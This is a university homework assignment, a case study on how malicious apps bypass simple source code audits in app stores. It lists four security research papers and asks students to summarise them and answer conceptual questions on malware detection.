Homework 3 - Case Study on Bypassing Simple Code Audits

The purpose of this case study is to look at how a malicious programmer might try to bypass simple code audits. This could allow a malicious app to be approved to the Apple, Android, or MS Windows app stores for example.

Before You Begin Reading The References

The References

• T. Wang, K. Lu, L. Lu, S. Chung and W. Lee, "Jekyll on iOS: When Benign Apps Become Evil", Proceedings of the 22nd USENIX Security Symposium, Washington, D.C., USA, August 14-16, 2013, [online] Presentation, Paper
• M. Ernst, R. Just, et. al, "Collaborative Verification of Information Flow for a High-Assurance App Store", Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security (CCS'14), 2014, [online] ACM Digital Library (PDF download available on-campus)
• Y. Zhou, Z. Wang, W. Zhou, and X. Jiang, "Hey, You, Get Off of My Market: Detecting Malicious Apps in Official and Alternative Android Markets," Proceedings of the 19th Annual Sympossium on Network and Distributed System Security (NDSS 12), 2012, [online] Paper
• A. Armando, G. Costa, L. Verderame, and A. Merlo, "Securing the "Bring Your Own Device" Paradigm", IEEE Computer, Volume 47, Issue 6, June 2014, pp. 48-56, [online] IEEE Explore (PDF download available on-campus)

The Writeup

1. Your 1-2 paragraphs that you wrote before reading the references
2. A 1-2 paragraph summary of each of the four references
3. Your responses to the following questions:
   1. Why is simple source code auditing ineffective at detecting malware? When answering, consider the techniques that the Jekyll app used to bypass the source code audit at the Apple Store.
   2. How do the additional techniques presented in the above references differ from source code auditing?
   3. What might a malicious programmer try to do in order to bypass the additional techniques?
4. A 1-2 paragraph summary of why you think detecting malicious apps is difficult.